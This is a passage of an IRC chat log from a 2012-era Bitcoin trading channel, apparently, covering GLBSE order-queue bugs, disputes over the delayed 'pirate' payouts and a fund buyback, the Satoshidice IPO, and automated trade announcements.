heck would I liquidate 2000 btc worth of mining bonds because you can't wait for pirate? That's not really my problem. Aug 24 16:12:28 You are spouting rubbish. I don't want any 7%, it was actually you who told me to hang on and wait for the divs, they haven't appeared so next question was when you will be buying back. Telling me to wait like everyone else when you have already made promises on it hasn't helped your integrity Aug 24 16:12:49 Yeah that's right, you have to wait like everyone else, for me to buy back. Aug 24 16:12:57 I offered you a percentage of yarr's assets Aug 24 16:13:10 Take it or leave it, unless there's some special reason why I should pay you first. Aug 24 16:13:33 You offered 1% div on monday with a buy back to follow. Neither have happened. Aug 24 16:13:37 You are very child like Aug 24 16:13:48 *shrug* then pull your money out of my funds Aug 24 16:13:58 I'm doing what I announced I would do last week Aug 24 16:14:04 2 weeks ago even. Aug 24 16:20:02 anyone having any issues with GLBSE and the new no reserver system? Aug 24 16:21:00 can't log in and had to reset my pw Aug 24 16:21:06 by open orderes are being canceled without a reason Aug 24 16:22:04 tonikt: orders are cancelled when you don't have enough BTC to cover them Aug 24 16:22:41 But I do have enough - and also sell orders are disappearing Aug 24 16:22:51 Basically randomly Aug 24 16:22:58 it's not random Aug 24 16:23:05 for buy orders Aug 24 16:23:18 when you withdraw, transfer BTC or make a buy Aug 24 16:23:35 it cancelles any orders where the amount would be greater than your balance Aug 24 16:23:42 for sell orders Aug 24 16:23:43 It said my order to buy YARR was queued Aug 24 16:23:49 ja Aug 24 16:23:50 Yes - but I dont do anything - just wait, not transactions and suddenly orders dissapera Aug 24 16:24:08 [GLBSE] [OBSI.HRPT] 339 @ 0.105 = 35.595 BTC [+] Aug 24 16:24:10 do you have a bot working on your account? Aug 24 16:24:16 me no Aug 24 16:24:33 usagi: orders are handled with a queue now Aug 24 16:24:44 so it doesn't tie up the web server Aug 24 16:24:55 well it's taking a long time to go thru hehe Aug 24 16:25:07 did you make teh order a couple of mins ago? Aug 24 16:25:08 [GLBSE] [V.HRL] 5 @ 1 = 5 BTC Aug 24 16:25:19 It shows up on my buy list Aug 24 16:25:21 o hey, glbse has a queue nao, liek mpex ? Aug 24 16:25:23 this is good. Aug 24 16:25:26 No just a minute ago Aug 24 16:25:39 Wow 1+minutes? Aug 24 16:25:42 I'd shut down the order processing for a minute Aug 24 16:25:48 while I was making some changes Aug 24 16:25:53 fixed a cancel bug Aug 24 16:26:00 not really - I use the API and a script to place the orders - I see them for awhile and then they disappear, randomly Aug 24 16:26:16 Ok it's on the market, my bad, someone likely a bot must have canceled the price target I saw Aug 24 16:26:20 next time it happens I can give you the order id Aug 24 16:26:31 sure Aug 24 16:36:36 [GLBSE] [DMC] 3 @ 0.05 = 0.15 BTC [+] Aug 24 16:36:46 nefario: order 1278414 has just been canceled without a reason Aug 24 16:37:01 [MPEX] [F.GIGA.ETF] 9000 @ 0.00100749 = 9.0674 BTC [+] Aug 24 16:37:27 thanks Aug 24 16:37:36 tonikt: why don't you use the web interface? Aug 24 16:37:59 I did try web interface - I had the same issue Aug 24 16:38:23 Its just easier for me to run the script than to go through the web forms Aug 24 16:38:55 and now 1278406 got canceled Aug 24 16:40:49 i thought satoshidice was going live Aug 24 16:40:51 at 12gmt Aug 24 16:40:52 I'll log into your account Aug 24 16:40:59 and investigate Aug 24 16:41:05 ok Aug 24 16:42:41 midnight rg Aug 24 16:42:56 you dont have to answer me in both channels Aug 24 16:43:16 nefario: something you did fixed my account available and balance to be in sync Aug 24 16:44:04 Ja Aug 24 16:46:08 nefario youve done so much work in the past few days Aug 24 16:46:16 you should sit back, relax, and treat yourself to a century egg Aug 24 16:46:28 preferably with a fertilized egg Aug 24 16:46:42 so its got half baby chicken in it Aug 24 16:47:07 rg: W T F? Aug 24 16:47:27 you dont know what a century egg is? Aug 24 16:47:32 you're in china dude Aug 24 16:47:54 http://en.wikipedia.org/wiki/Century_egg Aug 24 16:47:59 its very popular in chiner Aug 24 16:48:32 i bet you vast majority of chinese ppl don't eat that. Aug 24 16:48:37 they do Aug 24 16:48:42 its extremely common in noodle dishes Aug 24 16:48:53 like thts what they put in their ramen Aug 24 16:49:15 eh Aug 24 16:49:36 its a delicacy Aug 24 16:49:55 the fungus grows in snow flake forms Aug 24 16:49:57 delicacy means rarely eaten. Aug 24 16:50:19 no sir Aug 24 16:50:33 caviar is considered a delicacy and people eat that shit all the time Aug 24 16:50:39 shits gros Aug 24 16:51:08 so if you don't have enough btc for an order it just says your order has been queued then it dissapears? Aug 24 16:51:18 instead of straight up telling you no? Aug 24 16:51:22 and an angel gets it wings Aug 24 16:51:31 BTCHero: no, should tell you if you don't have enough Aug 24 16:51:56 i have a buy order and my available and balance are the same Aug 24 16:52:16 hmm, can you get the order 1 satoishi less than your balance? Aug 24 16:52:26 rg : Aug 24 16:52:34 .google caviarul si fetele Aug 24 16:52:40 uh oh Aug 24 16:52:45 is that fetus in rolamian Aug 24 16:52:47 um is it ded ? Aug 24 16:52:54 .g caviarul si fetele Aug 24 16:52:55 mircea_popescu: http://www.gandul.info/international/strategia-inedita-de-marketing-prin-care-o-companie-din-rusia-a-incercat-sa-atraga-investitori-straini-9374174 Aug 24 16:53:01 pff so broken Aug 24 16:53:44 what hte fuck happened to vragnaroda Aug 24 16:53:48 someone here knows Aug 24 16:53:54 i emailed him and he didn't reply Aug 24 16:54:00 what if he died Aug 24 16:54:06 nefario: i don't understand that request. I have .18xxx in my balance and ~.15 buy orders out. When i put in a order for .1 it just says it is queued instead of saying i can t do it Aug 24 16:54:10 like literally, walked in front of a bus by accident Aug 24 16:54:16 we'd never know Aug 24 16:54:26 oh Aug 24 16:54:31 [GLBSE] [PUREMINING] 20 @ 0.119 = 2.38 BTC [+] Aug 24 16:55:13 nefario, is there really no #glbse ? Aug 24 16:55:30 people tend to use companies more with an IRC presence Aug 24 16:55:34 i know i prefer companies on IRC Aug 24 16:55:42 most people know bitcoin-otc-eu for mpex/mircea Aug 24 16:55:44 or his oher channel Aug 24 16:55:49 rg: #GLBSE Aug 24 16:56:01 wtf Aug 24 16:56:05 why didn't my irc client show that Aug 24 16:56:08 i did /mode #glbse Aug 24 16:56:15 because it must be tarded Aug 24 16:56:15 that's supposed to return its modes and creation date Aug 24 16:56:27 its prolly some cheap chinese client you got. Aug 24 16:56:53 Channel #glbse modes: +cnt Aug 24 16:57:43 http://img.rtvslo.si/_up/upload/2012/08/24/64906844_a0_5zfhcmaehqwv.jpg Aug 24 16:58:21 is that pirate ? Aug 24 16:58:59 me? Aug 24 16:59:00 [GLBSE] [OBSI.HRPT] 14 @ 0.103 = 1.442 BTC [-] Aug 24 16:59:30 page 3 has a dead naked baby Aug 24 16:59:35 (if you dont understand previous pic http://www.telegraph.co.uk/culture/art/9491391/Elderly-woman-destroys-19th-century-fresco-with-DIY-restoration.html ) Aug 24 17:00:04 ahahahaaaa Aug 24 17:00:10 o GOD Aug 24 17:00:22 :D Aug 24 17:01:22 im blogging this. Aug 24 17:01:27 what's the source of your 1st ? Aug 24 17:01:52 irc :P Aug 24 17:02:22 oh my god Aug 24 17:02:24 what a dumb bitch Aug 24 17:02:33 mircea_popescu: hahaha Aug 24 17:03:27 nefario: How long should take for a orden to show up? Aug 24 17:03:49 no long Aug 24 17:03:51 couple of seconds Aug 24 17:03:56 Houston... Aug 24 17:04:13 I send some, and they aren't showing up... Aug 24 17:04:30 rdponticelli: panic Aug 24 17:04:40 just kidding Aug 24 17:04:40 lol Aug 24 17:04:42 nefario will fix it up Aug 24 17:04:43 rdponticelli: you send some....orders? of what pizza? Aug 24 17:04:52 do you mean you made a deposit? Aug 24 17:04:54 Orders Aug 24 17:05:00 I'll ask for a pizza Aug 24 17:05:01 or a buy/sell order? Aug 24 17:05:05 i think hes asking you what you ordered and how much Aug 24 17:05:13 Buy orders for ars Aug 24 17:05:27 i just outed myself for having .18 in my account Aug 24 17:05:33 now everyone knows i am poor Aug 24 17:06:01 [MPEX] [F.GIGA.ETF] 800 @ 0.00100749 = 0.806 BTC [+] Aug 24 17:06:03 [MPEX] [F.GIGA.ETF] 4100 @ 0.00100663 = 4.1272 BTC [-] Aug 24 17:06:04 [MPEX] [F.GIGA.ETF] 900 @ 0.0010064 = 0.9058 BTC [-] Aug 24 17:06:16 You mean that we, poor poor, are outlawed? Aug 24 17:06:26 :) Aug 24 17:06:40 just not taken seriously Aug 24 17:06:59 Lets make money, then... Aug 24 17:07:08 BTCHero: it happens Aug 24 17:07:22 I may start paying 7% a week for deposits... :) Aug 24 17:07:43 o rly? Aug 24 17:07:51 sounds risky Aug 24 17:08:12 Not really... Aug 24 17:08:18 What can go wrong? Aug 24 17:08:34 ;) Aug 24 17:09:20 I would really like to setup a fund to buy houses with, but the currency risk of btc is too high. if it went up i wouldn't be able to payback Aug 24 17:09:33 just not taken seriously << damn straight. Aug 24 17:09:53 BTCHero how'd that work tho ? Aug 24 17:10:09 [GLBSE] [PUREMINING] 6 @ 0.119 = 0.714 BTC [+] Aug 24 17:10:28 [GLBSE] [TYGRR.BOND-P] 2 @ 0.66 = 1.32 BTC [-] Aug 24 17:10:37 i get money, i buy houses I rent them out and mortgage them off and pay back Aug 24 17:10:44 [GLBSE] [OBSI.HRPT] 3 @ 0.103 = 0.309 BTC [-] Aug 24 17:10:56 why is currency risk a problem ? Aug 24 17:11:20 because if i borrowed all the btc at 10 and it went to 20 i would have to pay back 150k instead of 75k Aug 24 17:11:20 youd keep most of the money in USD anyway Aug 24 17:11:22 and buy btc Aug 24 17:11:24 youd need it Aug 24 17:11:29 BTCHero so buy puts ? Aug 24 17:11:30 BTCHero: somebody has made such a proposal on the forum... Aug 24 17:11:31 or calls. Aug 24 17:11:35 buy calls / sell puts. Aug 24 17:11:42 youd need an emergency fund for repairs if you were planning to landlord Aug 24 17:11:49 I think that some sgtspike... Aug 24 17:11:52 taxes Aug 24 17:11:56 rg: I am well aware Aug 24 17:12:11 it'd be an insane amount of paperwork Aug 24 17:12:21 not really Aug 24 17:12:22 so you're saying Aug 24 17:12:26 not dealing with a bank at all Aug 24 17:12:28 ? Aug 24 17:12:32 something like this would be a great thing to offer btc price some anchoring Aug 24 17:12:39 problem is the person has to be truisted. Aug 24 17:12:44 i trust btchero Aug 24 17:12:55 unless he pulls a pirate, gets a little money in his hands and runs away with it Aug 24 17:12:59 until, i can get enough equity in it to pay back the btc people with a mortgage Aug 24 17:13:05 then start over on house #2 Aug 24 17:13:10 no Aug 24 17:13:12 better idea Aug 24 17:13:15 lets flip houses Aug 24 17:13:18 and not even deal with renting Aug 24 17:13:20 BTCHero maybe it's worth spending a few hours to write this out. Aug 24 17:13:20 nah Aug 24 17:13:25 rg flip is dead. Aug 24 17:13:32 THERES A SHOW ON TV CALLED FLIP MEN Aug 24 17:13:39 I'm not flipping houses Aug 24 17:13:39 that's how you knwio its dead. Aug 24 17:13:47 [MPEX] [S.MPOE] 19200 @ 0.00039504 = 7.5848 BTC [-] Aug 24 17:13:48 why would tv lie Aug 24 17:13:52 its tv Aug 24 17:14:16 that's why. Aug 24 17:14:31 this Aug 24 17:14:37 this is too much to handle right now Aug 24 17:14:47 you're saying tv isnt real Aug 24 17:14:52 and the greatest part is even if i fuck up somehow, the people that loaned to me have a house that i can sell off. So their risk is whatever i lose on buying/selling the house Aug 24 17:15:08 BTCHero depends. you might just run off with it. Aug 24 17:15:12 BTCHero: and you can live in the house until you sell it Aug 24 17:15:14 well yeah that Aug 24 17:21:32 Ferris Bueler was a hacker Aug 24 17:31:31 [MPEX] [S.MPOE] 27443 @ 0.00039504 = 10.8411 BTC [-] Aug 24 17:33:04 what's the MPEX theme song Aug 24 17:33:06 can i pick it out Aug 24 17:33:13 you can make it loop in the backgroun Aug 24 17:33:36 how about katy perry - teenage dream Aug 24 17:33:42 that might be more of a GLBSE song Aug 24 17:36:05 i think it'd be hungarian dance #5. Aug 24 17:37:08 http://www.youtube.com/watch?v=3X9LvC9WkkQ < that Aug 24 17:37:44 let me see if i approve Aug 24 17:39:09 you curly haired bastard Aug 24 17:39:14 this isnt a good theme song Aug 24 17:41:16 lol why not ? Aug 24 17:42:31 it doesnt POP Aug 24 17:42:37 o noway, it pops. Aug 24 17:46:39 rg would you prefer offenbach ? http://www.youtube.com/watch?v=4Diu2N8TGKA Aug 24 17:53:03 nefario Website currently unavailable Aug 24 17:53:40 COULD YOU GIVE HIM A DAMN SECOND Aug 24 17:53:48 NO Aug 24 17:53:57 dude i dunno, i just went to check on DeaDTerra's fund thingee Aug 24 17:54:02 which is going up soon i think ? Aug 24 17:54:17 nope. DeaDTerra is me and i just trolled everyone Aug 24 17:56:17 o woe! Aug 24 17:56:35 well in the positive, the response time HAS in fact improved dramatically nao. Aug 24 17:59:40 yeah Aug 24 17:59:42 i think its much faster Aug 24 18:00:12 almost like google nao. Aug 24 18:03:48 [MPEX] [S.MPOE] 33900 @ 0.00039195 = 13.2871 BTC [-] Aug 24 18:03:50 [MPEX] [S.MPOE] 10100 @ 0.0003913 = 3.9521 BTC [-] Aug 24 18:07:58 glbse really, really needs to offer at least some signed proof of holdings to users Aug 24 18:08:21 rdponticelli im sure they'll get on the bandwagon. Aug 24 18:08:34 I hope so Aug 24 18:09:02 But it should be a priority Aug 24 18:09:43 [10:48:19] How about: http://lookatmyhorsemyhorseisamazing.com/ for a song. Aug 24 18:10:05 ciuciu: or everyday Im shufflin, or gangnam style, or rickroll Aug 24 18:11:41 [MPEX] [S.MPOE] 200 @ 0.0003916 = 0.0783 BTC [+] Aug 24 18:11:43 [MPEX] [S.MPOE] 18500 @ 0.0003913 = 7.2391 BTC [-] Aug 24 18:11:44 [MPEX] [S.MPOE] 6600 @ 0.00039095 = 2.5803 BTC [-] Aug 24 18:11:45 [MPEX] [S.MPOE] 17900 @ 0.00039064 = 6.9925 BTC [-] Aug 24 18:12:29 ive never seen that look at my horse thing Aug 24 18:12:51 [MPEX] [F.GIGA.ETF] 2716 @ 0.00101193 = 2.7484 BTC [+] Aug 24 18:12:53 [MPEX] [F.GIGA.ETF] 3584 @ 0.00101217 = 3.6276 BTC [+] Aug 24 18:12:53 rg: its made by the same guy that did pork.swf Aug 24 18:13:34 where did glbse go? Aug 24 18:13:42 o still not back ? Aug 24 18:14:02 nefario are you getting really slow net speed lately? Aug 24 18:14:18 rg : 20 minutes are how many seconds! Aug 24 18:14:32 [MPEX] [S.MPOE] 200 @ 0.00039228 = 0.0785 BTC [+] Aug 24 18:14:33 [MPEX] [S.MPOE] 18300 @ 0.00039304 = 7.1926 BTC [+] Aug 24 18:14:35 [MPEX] [S.MPOE] 8300 @ 0.00039425 = 3.2723 BTC [+] Aug 24 18:14:53 [MPEX] [S.MPOE] 200 @ 0.00039117 = 0.0782 BTC [-] Aug 24 18:14:55 [MPEX] [S.MPOE] 10976 @ 0.00039064 = 4.2877 BTC [-] Aug 24 18:14:57 [MPEX] [S.MPOE] 3624 @ 0.00039054 = 1.4153 BTC [-] Aug 24 18:15:10 duh Aug 24 18:15:13 DUH Aug 24 18:15:24 -1 Aug 24 18:15:40 blazing: major bug getting fixed Aug 24 18:15:48 amazing. i had an extra apple sauce left Aug 24 18:15:49 Awesome. Aug 24 18:16:14 nefario no i mean chinese internet speed Aug 24 18:16:17 Whenever you get the chance, approve that IPO at your leisure. Aug 24 18:16:56 i mean could you watch a youtube video if you wanted? Aug 24 18:20:32 blazing: no Aug 24 18:20:39 I remember dialup being better Aug 24 18:20:56 yeah its painful Aug 24 18:27:48 [MPEX] [S.MPOE] 9600 @ 0.00039054 = 3.7492 BTC [-] Aug 24 18:30:25 [MPEX] [S.MPOE] 200 @ 0.00039078 = 0.0782 BTC [+] Aug 24 18:30:27 [MPEX] [S.MPOE] 13200 @ 0.00039109 = 5.1624 BTC [+] Aug 24 18:30:28 [MPEX] [S.MPOE] 2562 @ 0.00039425 = 1.0101 BTC [+] Aug 24 18:30:29 [MPEX] [S.MPOE] 22938 @ 0.0003952 = 9.0651 BTC [+] Aug 24 18:33:10 and people are actually buying that crap for quick in-out :) Aug 24 18:37:01 hehe Aug 24 18:37:13 try downloading from a chinaman palce Aug 24 18:37:21 its probably real quick Aug 24 18:38:44 You wouldn't download a chinaman Aug 24 18:40:09 i want to get an asian bitvps node Aug 24 18:40:12 but i dont know where it'd go Aug 24 18:40:16 certainly not fucking china Aug 24 18:41:14 and the man of the hour Aug 24 18:41:20 the supreme dream team Aug 24 18:41:24 gigggggggggaaaaaa VPS! Aug 24 18:42:49 hello rg Aug 24 18:43:51 hello Aug 24 18:44:17 anything exciting happening? Aug 24 18:44:17 how're your miners? Aug 24 18:44:21 hot i take it Aug 24 18:44:23 blazing fast Aug 24 18:44:30 gigavps: satoshidice IPO goes live tonight at 12gmt Aug 24 18:44:42 [MPEX] [S.MPOE] 4800 @ 0.00039168 = 1.8801 BTC [-] Aug 24 18:44:43 pirate still hasnt paid Aug 24 18:44:45 i'm not really interested in their IPO Aug 24 18:44:47 glbse is upgraded with new code Aug 24 18:44:50 its much faster Aug 24 18:45:04 i think that's about it Aug 24 18:45:18 anyone else think of anything relevant to tell mr jiggavps? Aug 24 18:45:29 it makes me really wonder why a business that is supposed to be profitable and running is in need of OPM Aug 24 18:45:44 i guess they're doing it to get a story in an EU magazine Aug 24 18:45:49 IT's not in need Aug 24 18:45:58 Erik said he doesn't care if he doesn't sell them all Aug 24 18:46:02 so sayeth mircea Aug 24 18:46:07 lol Aug 24 18:46:13 why cash out? Aug 24 18:46:20 why not :P Aug 24 18:46:34 it's a very good question that is not answered Aug 24 18:46:46 also, their valuation of the site is a tad bit high Aug 24 18:46:53 i agree Aug 24 18:47:01 they have stuff posted like the made 2000 BTC in one day Aug 24 18:47:02 why not just sell the site? Aug 24 18:47:04 which i believe Aug 24 18:47:10 but i also think they gave it back the next day Aug 24 18:47:22 rg, i took SD for 800 btc in 24 hours Aug 24 18:47:27 yeah Aug 24 18:47:28 they didn't tell you that! Aug 24 18:47:30 i took them for a good amount too Aug 24 18:47:36 so Aug 24 18:47:36 mircea was telling me i was going to ruin the IPO Aug 24 18:47:37 :P Aug 24 18:47:38 [MPEX] [S.BVPS] 150 @ 0.00341976 = 0.513 BTC [-] Aug 24 18:47:45 lol Aug 24 18:47:47 good Aug 24 18:47:56 yes ppls, please to not ruin ipo by winning kthx Aug 24 18:48:17 gigavps just did a 10000 btc bet Aug 24 18:48:19 and won Aug 24 18:48:43 now im out of apple sauce Aug 24 18:48:45 humph :< Aug 24 18:49:03 where'd he get 10k btc ?! Aug 24 18:49:07 did pirate pay nao ? Aug 24 18:49:35 a lot of people are saying even if pirate does pay out Aug 24 18:49:42 he's still acted very unprofessional Aug 24 18:50:05 i try to put myself in his shoes Aug 24 18:50:15 its probably an amazingly difficult task Aug 24 18:50:42 people are being ridiculous Aug 24 18:50:49 pirate said it was going to take him a week to pay out Aug 24 18:50:59 well today is a week Aug 24 18:51:09 he's still acted very unprofessional << i heard this myself. Aug 24 18:51:33 and he mentioned monday, so I suspect he was going to pay out from this past monday to monday next week Aug 24 18:51:34 its like when that RAID controller died in the BitVPS server Aug 24 18:51:36 Jackmaninov from what i recall he said he will take the weekend off, then start paying on monday and BE DONE by now. oldest accts first. Aug 24 18:51:40 i updated the website main page every hour Aug 24 18:51:50 with what i knew / what was happenin / what was going to happen Aug 24 18:52:36 he hasnt said more than a few vague sentences Aug 24 18:52:43 or explained anything Aug 24 18:52:47 right, but there are a lot more opportunities for other people to game the market with any info he releases Aug 24 18:53:03 so? Aug 24 18:53:10 he doesnt have to say specific info Aug 24 18:53:13 he hasnt said ANYTHING Aug 24 18:53:33 and for example, how many people would be pissed if PPTA-E were paid out before TYGRR-P, and so the people paid first could go buy up unpaid bonds and make a killing? Aug 24 18:53:43 so Aug 24 18:53:45 that's not his problem Aug 24 18:53:52 he didn't ask you to create passthrough bonds and sell them Aug 24 18:54:18 his responsibility is to pay the people he owes Aug 24 18:54:21 not worry about stocks Aug 24 18:54:24 not worry about the btc price Aug 24 18:54:33 i still expect someone would try to sue him, especially if they can point to concrete money they "should" have made in the market Aug 24 18:54:37 not worry about annnnnything except paying his customers Aug 24 18:54:44 who knows Aug 24 18:54:46 so instead, if he's paying anyone at all, he's going to pay them all in one transaction or something Aug 24 18:54:49 lets work on getting paid first Aug 24 18:54:52 well Aug 24 18:54:54 Jackmaninov : he said x. he should have done x. what are you on about ? Aug 24 18:54:58 that sounds like im waiting for money from pirate, im not. Aug 24 18:55:00 problem is he said x and is not doing x. Aug 24 18:55:17 well, shit happens and plans change Aug 24 18:55:21 nope. Aug 24 18:55:24 we'll see what happens Aug 24 18:55:51 this "plans change" doesn't fly. the only way it can change is if he says he starts monday and finishes friday Aug 24 18:56:00 and instead starts saturday and finishes tuesday. Aug 24 18:56:03 that's the onl;y way plans change. Aug 24 18:56:34 that's assuming he meant business week when he said week Aug 24 18:56:43 no. Aug 24 18:56:50 if he didn't mean this, he should have specified Aug 24 18:57:00 otherwise, most disfavourable construction supported by the statement prevails. Aug 24 18:57:09 lol Aug 24 18:57:22 ^^ Aug 24 18:57:49 and that's what's been hilarious, everyone arguing about all their own disfavourable constructions all week all over every discussion method Aug 24 18:57:55 this is how you split things : one person cuts the other person picks. Aug 24 18:58:09 he has the power to write the contract. that means the contract is constructed always against him. Aug 24 18:58:41 i don't see what needs to be argued really. pretty clear as it is. Aug 24 19:05:50 [MPEX] [F.GIGA.ETF] 10714 @ 0.00101217 = 10.8444 BTC [+] Aug 24 19:05:51 [MPEX] [F.GIGA.ETF] 200 @ 0.00101681 = 0.2034 BTC [+] Aug 24 19:05:53 [MPEX] [F.GIGA.ETF] 3752 @ 0.00101715 = 3.8163 BTC [+] Aug 24 19:07:38 http://polimedia.us/dtng/c/src/134298402659.jpg best dress ever. Aug 24 19:15:52 [MPEX] [F.GIGA.ETF] 2334 @ 0.00102108 = 2.3832 BTC [+] Aug 24 19:15:53 [MPEX] [F.GIGA.ETF] 11266 @ 0.00101073 = 11.3869 BTC [-] Aug 24 19:16:10 mircea_popescu: you should show EskimoBob Aug 24 19:16:17 he might apprecitae it Aug 24 19:16:17 [MPEX] [S.MPOE] 200 @ 0.00039105 = 0.0782 BTC [-] Aug 24 19:16:18 [MPEX] [S.MPOE] 30800 @ 0.00039054 = 12.0286 BTC [-] Aug 24 19:16:38 nah, she's greek. Aug 24 19:18:40 [MPEX] [S.MPOE] 13376 @ 0.00039054 = 5.2239 BTC [-] Aug 24 19:18:41 [MPEX] [S.MPOE] 16224 @ 0.00038947 = 6.3188 BTC [-] Aug 24 19:35:19 [MPEX] [F.GIGA.ETF] 1134 @ 0.00101073 = 1.1462 BTC [-] Aug 24 19:35:20 [MPEX] [F.GIGA.ETF] 4000 @ 0.0010064 = 4.0256 BTC [-] Aug 24 19:35:21 [MPEX] [F.GIGA.ETF] 3600 @ 0.00100347 = 3.6125 BTC [-] Aug 24 19:35:22 [MPEX] [F.GIGA.ETF] 18000 @ 0.00098857 = 17.7943 BTC [-] Aug 24 19:35:23 [MPEX] [F.GIGA.ETF] 16083 @ 0.00098733 = 15.8792 BTC [-] Aug 24 19:35:24 [MPEX] [F.GIGA.ETF] 7183 @ 0.00098583 = 7.0812 BTC [-] Aug 24 19:35:28 [MPEX] [S.MPOE] 200 @ 0.0003909 = 0.0782 BTC [+] Aug 24 19:35:30 [MPEX] [S.MPOE] 34900 @ 0.00039168 = 13.6696 BTC [+] Aug 24 19:37:32 [MPEX] [O.BTCUSD.C100T] 5 @ 0.05882918 = 0.2941 BTC [-] Aug 24 19:37:33 [MPEX] [O.BTCUSD.C100T] 795 @ 0.05418994 = 43.081 BTC [-] Aug 24 19:53:13 ;;ticker Aug 24 19:53:14 Best bid: 9.956, Best ask: 9.957, Bid-ask spread: 0.00100, Last trade: 9.956, 24 hour volume: 56053, 24 hour low: 9.852, 24 hour high: 10.25 Aug 24 19:54:20 [MPEX] [S.MPOE] 200 @ 0.00039016 = 0.078 BTC [-] Aug 24 19:54:21 [MPEX] [S.MPOE] 7110 @ 0.00038947 = 2.7691 BTC [-] Aug 24 19:54:22 [MPEX] [S.MPOE] 14190 @ 0.00038903 = 5.5203 BTC [-] Aug 24 19:56:31 [MPEX] [S.MPOE] 200 @ 0.00039104 = 0.0782 BTC [+] Aug 24 19:56:32 [MPEX] [S.MPOE] 14400 @ 0.00039168 = 5.6402 BTC [+] Aug 24 20:03:46 [MPEX] [S.MPOE] 8462 @ 0.0003952 = 3.3442 BTC [+] Aug 24 20:03:48 [MPEX] [S.MPOE] 23438 @ 0.00039664 = 9.2964 BTC [+] Aug 24 20:06:13 ;;tslb Aug 24 20:06:18 Time since last block: 30 minutes and 27 seconds Aug 24 20:06:22 whoa ?! Aug 24 20:06:31 Y U NO MATH, MINERS!!! Aug 24 20:10:05 vacation Aug 24 20:10:15 l;azy bums Aug 24 20:16:56 mircea_popescu: is there an 'easy' way to see past divident payments of assets on mpex? Aug 24 20:17:44 yes, the issuers have to publish them Aug 24 20:17:50 so you follow the link on the asset page Aug 24 20:18:00 mpex issues them signed certificated for each payment Aug 24 20:19:05 aka no Aug 24 20:19:18 aka yes, d'uh. Aug 24 20:20:41 on glbse you can click a button Aug 24 20:20:43 and it shows divs Aug 24 20:20:45 just sayin.. Aug 24 20:21:24 thanks mircea_popescu Aug 24 20:22:09 i meant 'easy' as in not having to write some code whic polls a json line and parses it and such Aug 24 20:22:22 mmm Aug 24 20:22:39 well from that perspective this is very hard, cause you have to go fishing for them Aug 24 20:22:43 what are you trying to do tho ? Aug 24 20:28:04 ;;tslb Aug 24 20:28:06 Time since last block: 1 minute and 39 seconds Aug 24 20:28:09 aha Aug 24 20:34:57 mircea_popescu: what am i trying to do? see a man about a duck Aug 24 20:35:04 lol ?! Aug 24 20:35:36 ;), no really, just find the best answer to a question posed to me Aug 24 20:36:30 what happened with glbse.com? Aug 24 20:37:11 it sped up Aug 24 20:37:37 any post, comment, statement from the owner? Aug 24 20:37:54 PK Aug 24 20:37:56 I'm working on a bug Aug 24 20:37:59 nearly fixed Aug 24 20:38:05 ETA 5-10 mins Aug 24 20:38:11 nefario, so it's down for maintenance? Aug 24 20:38:58 no Aug 24 20:39:04 I added a new backend Aug 24 20:39:13 and after a few hours noticed a serious bug Aug 24 20:40:27 I still call that "down for maintenance" compared to "down for good, hacked, exploded, never comes back". I hope no one had a chance to exploit that bug. Aug 24 20:41:01 down for bitcoinicance. Aug 24 20:41:35 we're back Aug 24 20:42:10 DeaDTerra you about ? Aug 24 20:42:14 yay Aug 24 20:43:08 is it me or Amy Willis from the guardian la is kinda hawt ? Aug 24 20:43:26 nefario, so how is reserve calculated now? ie: what is the ratio of btc on hand to bids? Aug 24 20:44:37 for buying Aug 24 20:44:45 you can make as many bids as you like Aug 24 20:45:00 the total value of a bid must not exceed your balance Aug 24 20:45:15 when your balance lowers, any bids that are larger than it are cancelled Aug 24 20:46:11 interesting Aug 24 20:46:16 nice Aug 24 20:46:23 [GLBSE] [FOO.PPPPT] 6 @ 0.99 = 5.94 BTC [+] Aug 24 20:46:23 I'd say that's a good change Aug 24 20:46:32 http://bou.si/4c/1345821363838.jpg Aug 24 20:46:33 big time Aug 24 20:46:39 liquidty will increase overnight Aug 24 20:46:39 hello Aug 24 20:47:24 i'd hate to see a market panic with bids that disappear though... Aug 24 20:47:48 use limit orders. Aug 24 20:48:01 they won't realy dissapeer because as soon as the account can't honor the bid it is removed Aug 24 20:48:02 trades on hold ATM Aug 24 20:48:05 not like the old style Aug 24 20:48:27 a bid will still represent actual funds Aug 24 20:48:41 usagi: i agree limit orders are the rational thing to do, but panics aren't rational :) Aug 24 20:48:56 You can't enter market orders on GLBSE tho. Aug 24 20:49:04 Unless you're an idiot and type in 0.000001 Aug 24 20:49:31 glbse has no market orders ?! Aug 24 20:49:38 what happens if you don't fill in the price ? Aug 24 20:49:52 Market orders are stupid and were created to fool rubes. Aug 24 20:50:25 [MPEX] [S.MPOE] 15262 @ 0.00039664 = 6.0535 BTC [+] Aug 24 20:50:26 [MPEX] [S.MPOE] 4200 @ 0.00039692 = 1.6671 BTC [+] Aug 24 20:50:28 [MPEX] [S.MPOE] 13238 @ 0.00039695 = 5.2548 BTC [+] Aug 24 20:50:28 hm Aug 24 20:50:43 bid side is getting larger Aug 24 20:50:45 compared to ask Aug 24 20:50:50 ;;ticker Aug 24 20:50:50 Best bid: 9.98733, Best ask: 10.01299, Bid-ask spread: 0.02566, Last trade: 10.01299, 24 hour volume: 42892, 24 hour low: 9.852, 24 hour high: 10.25 Aug 24 20:51:21 yeah, a lot more strength on the bid side now Aug 24 20:51:32 on gox ? Aug 24 20:51:45 yea Aug 24 20:52:01 was just peeking at this one: http://bitcoincharts.com/markets/mtgoxUSD.html Aug 24 20:52:54 [GLBSE] [ASICMINER] 25 @ 0.09 = 2.25 BTC [-] Aug 24 20:52:55 ya Aug 24 20:52:56 [GLBSE] [OBSI.HRPT] 83 @ 0.103 = 8.549 BTC [-] Aug 24 20:57:22 [GLBSE] [OBSI.HRPT] 83 @ 0.103 = 8.549 BTC [-] Aug 24 20:57:30 if trades are on hold, then how comes that assobot is announcing trades? Aug 24 20:58:10 because it's an ass Aug 24 20:58:15 :) Aug 24 20:58:15 also they back Aug 24 20:58:51 ok - I see it. cheers Aug 24 20:59:11 fucking loads of orders pouring in Aug 24 20:59:31 beautiful to watch them skip across the screen Aug 24 20:59:58 [GLBSE] [OBSI.HRPT] 39 @ 0.106 = 4.134 BTC [+] Aug 24 21:04:34 [GLBSE] [ASICMINER] 5 @ 0.09 = 0.45 BTC [-] Aug 24 21:04:41 [MPEX] [S.MPOE] 5217 @ 0.00039695 = 2.0709 BTC [+] Aug 24 21:04:42 [MPEX] [S.MPOE] 3983 @ 0.00039745 = 1.583 BTC [+] Aug 24 21:07:03 [GLBSE] [TYGRR.BOND-P] 3 @ 0.6 = 1.8 BTC [-] Aug 24 21:07:05 